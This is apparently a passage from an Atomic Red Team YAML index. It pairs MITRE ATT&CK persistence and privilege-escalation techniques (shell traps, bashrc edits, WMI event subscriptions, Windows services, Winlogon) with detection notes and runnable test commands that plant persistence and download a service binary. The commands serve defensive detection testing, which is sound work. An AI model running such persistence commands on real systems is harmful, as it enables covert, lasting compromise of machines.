kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-24T16:43:02.273Z' + created: '2020-01-24T14:17:43.906Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_detection: Trap commands must be registered for the shell or programs, + so they appear in files. Monitoring files for suspicious or overly broad trap + commands can narrow down suspicious behavior during an investigation. Monitor + for suspicious processes executed through trap interrupts. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_platforms: + - macOS + - Linux + identifier: T1546.005 + atomic_tests: + - name: Trap + auto_generated_guid: a74b2e07-5952-4c03-8b56-56274b076b61 + description: | + After exiting the shell, the script will download and execute. + After sending a keyboard interrupt (CTRL+C) the script will download and execute. + supported_platforms: + - macos + - linux + executor: + command: | + trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash" EXIT + exit + trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash" SIGINt + name: sh + T1546.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.004 + url: https://attack.mitre.org/techniques/T1546/004 + - source_name: intezer-kaiji-malware + url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/ + description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware + turning to Golang. Retrieved December 17, 2020.' + - source_name: bencane blog bashrc + url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/ + description: Benjamin Cane. (2013, September 16). Understanding a little more + about /etc/profile and /etc/bashrc. Retrieved February 25, 2021. + - source_name: anomali-rocke-tactics + url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect + description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining + Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved + December 17, 2020. + - source_name: Linux manual bash invocation + url: https://wiki.archlinux.org/index.php/Bash#Invocation + description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021. + - source_name: Tsunami + url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/ + description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware + Targets DVRs, Forms Botnet. Retrieved December 17, 2020. + - source_name: anomali-linux-rabbit + url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat + description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot + Malware Out of a Hat. Retrieved December 17, 2020. + - source_name: Magento + url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html + description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection + Vector. Retrieved December 17, 2020. + - source_name: ScriptingOSX zsh + url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/ + description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration + Files. Retrieved February 25, 2021.' + - source_name: PersistentJXA_leopitt + url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5 + description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell + for macOS. Retrieved January 11, 2021. + - source_name: code_persistence_zsh + url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js + description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js. + Retrieved January 11, 2021. + - source_name: ESF_filemonitor + url: https://objective-see.com/blog/blog_0x48.html + description: Patrick Wardle. (2019, September 17). Writing a File Monitor + with Apple's Endpoint Security Framework. Retrieved December 17, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Unix Shell Configuration Modification + description: "Adversaries may establish persistence through executing malicious + commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s + execute several configuration scripts at different points throughout the session + based on events. For example, when a user opens a command-line interface or + remotely logs in (such as via SSH) a login shell is initiated. The login shell + executes scripts from the system (/etc) and the user’s home directory + (~/) to configure the environment. All login shells on a system + use /etc/profile when initiated. These configuration scripts run at the permission + level of their directory and are often used to set environment variables, + create aliases, and customize the user’s environment. When the shell exits + or terminates, additional shell scripts are executed to ensure the shell exits + appropriately. \n\nAdversaries may attempt to establish persistence by inserting + commands into scripts automatically executed by shells. Using bash as an example, + the default shell for most GNU/Linux systems, adversaries may add commands + that launch malicious binaries into the /etc/profile and /etc/profile.d + files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These + files typically require root permissions to modify and are executed each time + any shell on a system launches. For user level permissions, adversaries can + insert malicious commands into ~/.bash_profile, ~/.bash_login, + or ~/.profile which are sourced when a user opens a command-line + interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: + Linux manual bash invocation) Since the system only executes the first existing + file in the listed order, adversaries have used ~/.bash_profile + to ensure execution. Adversaries have also leveraged the ~/.bashrc + file which is additionally executed if the connection is established remotely + or an additional interactive shell is opened, such as a new tab in the command-line + interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: + Magento) Some malware targets the termination of a program to trigger execution, + adversaries can use the ~/.bash_logout file to execute malicious + commands at the end of a session. \n\nFor macOS, the functionality of this + technique is similar but may leverage zsh, the default shell for macOS 10.15+. + When the Terminal.app is opened, the application launches a zsh login shell + and a zsh interactive shell. The login shell configures the system environment + using /etc/profile, /etc/zshenv, /etc/zprofile, + and /etc/zlogin.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: + code_persistence_zsh) The login shell then configures the user environment + with ~/.zprofile and ~/.zlogin. The interactive + shell uses the ~/.zshrc to configure the user environment. Upon + exiting, /etc/zlogout and ~/.zlogout are executed. + For legacy programs, macOS executes /etc/bashrc on startup." + id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-03-08T15:22:54.089Z' + created: '2020-01-24T14:13:45.936Z' + x_mitre_contributors: + - Robert Wilson + - Tony Lambert, Red Canary + x_mitre_version: '2.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_detection: "While users may customize their shell profile files, there + are only certain types of commands that typically appear in these files. Monitor + for abnormal commands such as execution of unknown programs, opening network + sockets, or reaching out across the network when user profiles are loaded + during the login process.\n\nMonitor for changes to /etc/profile + and /etc/profile.d, these files should only be modified by system + administrators. MacOS users can leverage Endpoint Security Framework file + events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor + most Linux and macOS systems, a list of file paths for valid shell options + available on a system are located in the /etc/shells file.\n" + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_platforms: + - Linux + - macOS + identifier: T1546.004 + atomic_tests: + - name: Add command to .bash_profile + auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f + description: 'Adds a command to the .bash_profile file of the current user + +' + supported_platforms: + - macos + - linux + input_arguments: + command_to_add: + description: Command to add to the .bash_profile file + type: string + default: "/path/to/script.py" + executor: + command: 'echo "#{command_to_add}" >> ~/.bash_profile + +' + name: sh + - name: Add command to .bashrc + auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f + description: 'Adds a command to the .bashrc file of the current user + +' + supported_platforms: + - macos + - linux + input_arguments: + command_to_add: + description: Command to add to the .bashrc file + type: string + default: "/path/to/script.py" + executor: + command: 'echo "#{command_to_add}" >> ~/.bashrc + +' + name: sh + T1055.014: + technique: + id: attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5 + description: "Adversaries may inject malicious code into processes via VDSO + hijacking in order to evade process-based defenses as well as possibly elevate + privileges. Virtual dynamic shared object (vdso) hijacking is a method of + executing arbitrary code in the address space of a separate live process. + \n\nVDSO hijacking involves redirecting calls to dynamically linked shared + libraries. Memory protections may prevent writing executable code to a process + via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). + However, an adversary may hijack the syscall interface code stubs mapped into + a process from the vdso shared object to execute syscalls to open and map + a malicious shared object. This code can then be invoked by redirecting the + execution flow of the process via patched memory address references stored + in a process' global offset table (which store absolute addresses of mapped + library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace + VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014)\n\nRunning code in + the context of another process may allow access to the process's memory, system/network + resources, and possibly elevated privileges. Execution via VDSO hijacking + may also evade detection from security products since the execution is masked + under a legitimate process. " + name: VDSO Hijacking + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1055.014 + url: https://attack.mitre.org/techniques/T1055/014 + - source_name: ELF Injection May 2009 + url: https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html + description: O'Neill, R. (2009, May). Modern Day ELF Runtime infection via + GOT poisoning. Retrieved March 15, 2020. + - source_name: Backtrace VDSO + url: https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/ + description: backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS. + Retrieved June 15, 2020. + - source_name: VDSO Aug 2005 + url: https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/ + description: Petersson, J. (2005, August 14). What is linux-gate.so.1?. Retrieved + June 16, 2020. + - source_name: Syscall 2014 + url: https://lwn.net/Articles/604515/ + description: Drysdale, D. (2014, July 16). Anatomy of a system call, part + 2. Retrieved June 16, 2020. + - description: 'Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: + Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved + December 20, 2017.' + source_name: ArtOfMemoryForensics + - url: https://www.gnu.org/software/acct/ + description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved + December 20, 2017. + source_name: GNU Acct + - url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing + description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide - + Chapter 7 - System Auditing. Retrieved December 20, 2017. + source_name: RHEL auditd + - url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html + description: stderr. (2014, February 14). Detecting Userland Preload Rootkits. + Retrieved December 20, 2017. + source_name: Chokepoint preload rootkits + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-06-20T22:28:45.232Z' + created: '2020-01-14T01:35:00.781Z' + x_mitre_defense_bypassed: + - Anti-virus + - Application control + x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace + and mmap, that can be used to attach to, manipulate memory, then redirect + a processes' execution path. Monitoring for Linux specific calls such as the + ptrace system call should not generate large amounts of data due to their + specialized nature, and can be a very effective method to detect some of the + common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: + GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) + \n\nAnalyze process behavior to determine if a process is performing actions + it usually does not, such as opening network connections, reading files, or + other suspicious actions that could relate to post-compromise behavior. " + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Module: Module Load' + x_mitre_platforms: + - Linux + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + atomic_tests: [] + T1078: + technique: + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1078 + url: https://attack.mitre.org/techniques/T1078 + - external_id: CAPEC-560 + source_name: capec + url: https://capec.mitre.org/data/definitions/560.html + - url: https://technet.microsoft.com/en-us/library/dn535501.aspx + description: Microsoft. (2016, April 15). Attractive Accounts for Credential + Theft. Retrieved June 3, 2016. + source_name: TechNet Credential Theft + - url: https://technet.microsoft.com/en-us/library/dn487457.aspx + description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved + June 3, 2016. + source_name: TechNet Audit Policy + description: |- + Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. + + The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft) + name: Valid Accounts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: initial-access + modified: '2021-04-12T18:27:52.298Z' + created: '2017-05-31T21:31:00.645Z' + x_mitre_version: '2.2' + x_mitre_data_sources: + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + x_mitre_defense_bypassed: + - Firewall + - Host intrusion prevention systems + - Network intrusion detection system + - Application control + - System access controls + - Anti-virus + x_mitre_detection: |- + Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). + + Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately. + x_mitre_permissions_required: + - User + - Administrator + x_mitre_effective_permissions: + - User + - Administrator + x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS + - Linux + - macOS + - Google Workspace + - Containers + x_mitre_contributors: + - Yossi Weizman, Azure Defender Research Team + - Netskope + - Mark Wee + - Praetorian + x_mitre_is_subtechnique: false + atomic_tests: [] + T1546.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.003 + url: https://attack.mitre.org/techniques/T1546/003 + - url: https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf + description: 'Mandiant. (2015, February 24). M-Trends 2015: A View from the + Front Lines. Retrieved May 18, 2016.' + source_name: Mandiant M-Trends 2015 + - source_name: FireEye WMI SANS 2015 + url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf + description: Devon Kerr. (2015). There's Something About WMI. Retrieved May + 4, 2020. + - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf + description: Ballenthin, W., et al. (2015). Windows Management Instrumentation + (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016. + source_name: FireEye WMI 2015 + - url: https://www.secureworks.com/blog/wmi-persistence + description: Dell SecureWorks Counter Threat Unit™ (CTU) Research Team. (2016, + March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016. + source_name: Dell WMI Persistence + - source_name: Microsoft MOF May 2018 + url: https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof- + description: Satran, M. (2018, May 30). Managed Object Format (MOF). Retrieved + January 24, 2020. + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + - description: French, D. (2018, October 9). Detecting & Removing an Attacker’s + WMI Persistence. Retrieved October 11, 2019. + url: https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96 + source_name: Medium Detecting WMI Persistence + - source_name: Elastic - Hunting for Persistence Part 1 + url: https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1 + description: 'French, D., Murphy, B. (2020, March 24). Adversary tradecraft + 101: Hunting for persistence using Elastic Security (Part 1). Retrieved + December 21, 2020.' + - source_name: Microsoft Register-WmiEvent + url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmievent?view=powershell-5.1 + description: Microsoft. (n.d.). Retrieved January 24, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Windows Management Instrumentation Event Subscription + description: |- + Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015) + + Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018) + + WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges. + id: attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-13T21:32:54.094Z' + created: '2020-01-24T14:07:56.276Z' + x_mitre_contributors: + - Brent Murphy, Elastic + - David French, Elastic + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_detection: |- + Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence) Monitor for the creation of new WMI EventFilter, EventConsumer, and FilterToConsumerBinding events. Event ID 5861 is logged on Windows 10 systems when new EventFilterToConsumerBinding events are created.(Citation: Elastic - Hunting for Persistence Part 1) + + Monitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process). + x_mitre_data_sources: + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'WMI: WMI Creation' + x_mitre_platforms: + - Windows + identifier: T1546.003 + atomic_tests: + - name: Persistence via WMI Event Subscription + auto_generated_guid: 3c64f177-28e2-49eb-a799-d767b24dd1e0 + description: | + Run from an administrator powershell window. After running, reboot the victim machine. + After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. + + Code references + + https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af + + https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 + supported_platforms: + - windows + executor: + command: | + $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; + EventNameSpace='root\CimV2'; + QueryLanguage="WQL"; + Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}; + $Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs + + $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; + CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";} + $Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs + + $FilterToConsumerArgs = @{ + Filter = [Ref] $Filter; + Consumer = [Ref] $Consumer; + } + $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs + cleanup_command: | + $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" + $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" + $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue + $FilterConsumerBindingToCleanup | Remove-WmiObject + $EventConsumerToCleanup | Remove-WmiObject + $EventFilterToCleanup | Remove-WmiObject + name: powershell + elevation_required: true + T1543.003: + technique: + created: '2020-01-17T19:13:50.402Z' + modified: '2020-09-16T15:49:58.490Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1543.003 + url: https://attack.mitre.org/techniques/T1543/003 + - external_id: CAPEC-478 + source_name: capec + url: https://capec.mitre.org/data/definitions/478.html + - external_id: CAPEC-550 + source_name: capec + url: https://capec.mitre.org/data/definitions/550.html + - external_id: CAPEC-551 + source_name: capec + url: https://capec.mitre.org/data/definitions/551.html + - url: https://technet.microsoft.com/en-us/library/cc772408.aspx + description: Microsoft. (n.d.). Services. Retrieved June 7, 2016. + source_name: TechNet Services + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + - url: https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697 + description: 'Miroshnikov, A. & Hall, J. (2017, April 18). 4697(S): A service + was installed in the system. Retrieved August 7, 2018.' + source_name: Microsoft 4697 APR 2017 + - url: https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection + description: Hardy, T. & Hall, J. (2018, February 15). Use Windows Event Forwarding + to help with intrusion detection. Retrieved August 7, 2018. + source_name: Microsoft Windows Event Forwarding FEB 2018 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Windows Service + description: "Adversaries may create or modify Windows services to repeatedly + execute malicious payloads as part of persistence. When Windows boots up, + it starts programs or applications called services that perform background + system functions.(Citation: TechNet Services) Windows service configuration + information, including the file path to the service's executable or recovery + programs/commands, is stored in the Windows Registry. Service configurations + can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075). + \n\nAdversaries may install a new service or modify an existing service by + using system utilities to interact with services, by directly modifying the + Registry, or by using custom tools to interact with the Windows API. Adversaries + may configure services to execute at startup in order to persist on a system.\n\nAn + adversary may also incorporate [Masquerading](https://attack.mitre.org/techniques/T1036) + by using a service name from a related operating system or benign software, + or by modifying existing services to make detection analysis more challenging. + Modifying existing services may interrupt their functionality or may enable + services that are disabled or otherwise not commonly used. \n\nServices may + be created with administrator privileges but are executed under SYSTEM privileges, + so an adversary may also use a service to escalate privileges from administrator + to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). " + id: attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32 + x_mitre_contributors: + - Matthew Demaske, Adaptforward + - Travis Smith, Tripwire + - Pedro Harrison + x_mitre_data_sources: + - 'Service: Service Creation' + - 'Service: Service Modification' + - 'Process: Process Creation' + - 'Process: OS API Execution' + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + x_mitre_effective_permissions: + - Administrator + - SYSTEM + x_mitre_detection: "Monitor processes and command-line arguments for actions + that could create or modify services. Command-line invocation of tools capable + of adding or modifying services may be unusual, depending on how systems are + typically used in a particular environment. Services may also be modified + through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) + and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional + logging may need to be configured to gather the appropriate data. Remote access + tools with built-in features may also interact directly with the Windows API + to perform these functions outside of typical system utilities. Collect service + utility execution and service binary path arguments used for analysis. Service + binary paths may even be changed to execute commands or scripts. \n\nLook + for changes to service Registry entries that do not correlate with known software, + patch cycles, etc. Service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. + Changes to the binary path and the service startup type changed from manual + or disabled to automatic, if it does not typically do so, may be suspicious. + Tools such as Sysinternals Autoruns may also be used to detect system service + changes that could be attempts at persistence.(Citation: TechNet Autoruns) + \ \n\nCreation of new services may generate an alterable event (ex: Event + ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft + Windows Event Forwarding FEB 2018)). New, benign services may be created during + installation of new software.\n\nSuspicious program execution through services + may show up as outlier processes that have not been seen before when compared + against historical data. Look for abnormal process call trees from known services + and for execution of other commands that could relate to Discovery or other + adversary techniques. Data and events should not be viewed in isolation, but + as part of a chain of behavior that could lead to other activities, such as + network connections made for Command and Control, learning details about the + environment through Discovery, and Lateral Movement." + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows + identifier: T1543.003 + atomic_tests: + - name: Modify Fax service to run PowerShell + auto_generated_guid: ed366cde-7d12-49df-a833-671904770b9f + description: | + This test will temporarily modify the service Fax by changing the binPath to PowerShell + and will then revert the binPath change, restoring Fax to its original state. + Upon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn. + supported_platforms: + - windows + executor: + name: command_prompt + elevation_required: true + command: | + sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\"" + sc start Fax + cleanup_command: sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul + 2>&1 + - name: Service Installation CMD + auto_generated_guid: 981e2942-e433-44e9-afc1-8c957a1496b6 + description: | + Download an executable from github and start it as a service. + Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout. + supported_platforms: + - windows + input_arguments: + binary_path: + description: Name of the service binary, include path. + type: Path + default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe + service_name: + description: Name of the Service + type: String + default: AtomicTestService_CMD + dependency_executor_name: powershell + dependencies: + - description: 'Service binary must exist on disk at specified location (#{binary_path}) + +' + prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" + executor: + name: command_prompt + elevation_required: true + command: | + sc.exe create #{service_name} binPath= #{binary_path} + sc.exe start #{service_name} + cleanup_command: | + sc.exe stop #{service_name} >nul 2>&1 + sc.exe delete #{service_name} >nul 2>&1 + - name: Service Installation PowerShell + auto_generated_guid: 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 + description: | + Installs A Local Service via PowerShell. + Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed. + supported_platforms: + - windows + input_arguments: + binary_path: + description: Name of the service binary, include path. + type: Path + default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe + service_name: + description: Name of the Service + type: String + default: AtomicTestService_PowerShell + dependency_executor_name: powershell + dependencies: + - description: 'Service binary must exist on disk at specified location (#{binary_path}) + +' + prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" + executor: + name: powershell + elevation_required: true + command: | + New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}" + Start-Service -Name "#{service_name}" + cleanup_command: | + Stop-Service -Name "#{service_name}" 2>&1 | Out-Null + try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()} + catch {} + T1547.004: + technique: + created: '2020-01-24T16:59:59.688Z' + modified: '2020-04-21T16:00:41.277Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + id: attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35 + description: "Adversaries may abuse features of Winlogon to execute DLLs and/or + executables when a user logs in. Winlogon.exe is a Windows component responsible + for actions at logon/logoff as well as the secure attention sequence (SAS) + triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows + NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows + NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper + programs and functionalities that support Winlogon. (Citation: Cylance Reg + Persistence Sept 2013) \n\nMalicious modifications to these Registry keys + may cause Winlogon to load and execute malicious DLLs and/or executables. + Specifically, the following subkeys have been known to be possibly vulnerable 